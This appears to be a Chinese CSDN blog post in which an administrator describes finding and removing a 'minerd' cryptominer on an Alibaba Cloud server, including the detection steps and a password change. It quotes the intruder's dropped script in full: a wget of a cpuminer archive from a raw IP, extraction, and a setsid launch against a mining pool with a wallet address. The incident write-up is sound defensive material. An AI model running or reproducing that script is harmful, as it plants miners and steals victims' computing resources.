关闭

服务器被挖矿minerd

5681人阅读 评论(4) 收藏 举报
分类:

用的阿里云服务器,这两天报警,load值高,

看了下管理控制台,近期流量也耗了不少钱

top 看了下 有个进程耗cpu居高不下,

进程:/tmp/minerd

百度了下,原来是个挖矿程序

如果top看不到的话,ps查看每一个进程名,也可以发现端倪

不知道是暴力破解密码还是通过其他漏洞植入的

在/tmp目录下放了一个sh文件

文件内容:

wget http://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
setsid /tmp/minerd -a scrypt  -o 31.41.40.25:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk:1 &

杀掉进程后查看了下定时任务 crontab -l   ,定时任务没有做手脚

目前先修改了登陆密码,后续再观察

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:20171次
    • 积分:367
    • 等级:
    • 排名:千里之外
    • 原创:13篇
    • 转载:13篇
    • 译文:0篇
    • 评论:4条
    文章分类
    最新评论